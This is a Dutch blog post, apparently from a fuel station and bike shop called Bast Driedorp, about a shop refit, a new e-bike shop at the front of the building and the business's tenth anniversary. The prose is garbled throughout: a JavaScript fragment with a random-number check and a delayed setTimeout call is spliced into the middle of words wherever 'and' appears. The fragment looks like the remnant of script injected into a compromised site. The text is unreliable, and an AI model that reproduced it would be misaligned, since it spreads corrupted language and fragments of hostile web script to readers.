Hé, pssssttttt… Heb je ‘t al gehoord?

Hé, pssssttttt… Heb je ‘t al gehoord?

Bast Driedorp is van alles aan het verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen. De shop zit al middenin zijn metamorfose, maar ik heb uit betrouwbare bron gehoord dat buiten ook alles verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderd gaat worden…

Total heeft natuurlijk inmiddels al jaren een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere uitstraling. Het zou zo maar kunnen dat Bast Driedorp deze kleuren ook gaat krijgen.

Wat is er verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderd in de shop?
Niet heel veel. Er zijn geen producten verdwenen in elk geval. Wel het schap in het midden van de shop en de indeling is net even andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders. Zo staan de aardappelen en eieren niet meer naar de buitendeur, maar in het schap richting de koffieautomaat. Ja, best handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig om te weten als je je eieren normaal bij ons koopt. De andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere wijzigingen zijn best duidelijk denk ik, maar kom gerust eens kijken.

De winkel aan de voorzijde van het pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and ondergaat komende week een metmamorfose. Althans, wat de inrichting betreft. De voorkant van de zaak, wordt namelijk onze elektrische fietsenwinkel! Even heen en weer slepen met de fietsen, maar dan hebben we ook alle ruimte voor alle elektrische fietsen en de accessoires voor alle fietsen.

Dat betekent inderdaad dat we boven in onze showroom ook aan de slag moeten. Meer dan 100 fietsen moeten een mooie plek krijgen en dat is best een uitdaging. Gelukkig hebben we leuke ideeen om dit voor elkaar te krijgen. Dit gaat echter nog even duren, dus vragen we nog even geduld.

Ach voor het 10-jarig bestaan van Bast Driedorp, willen we natuurlijk wel alles picobello in orde hebben. Dus dit jaar even het gas erop, dan kunnen we volgend jaar het hele jaar feest vieren!

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *

Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.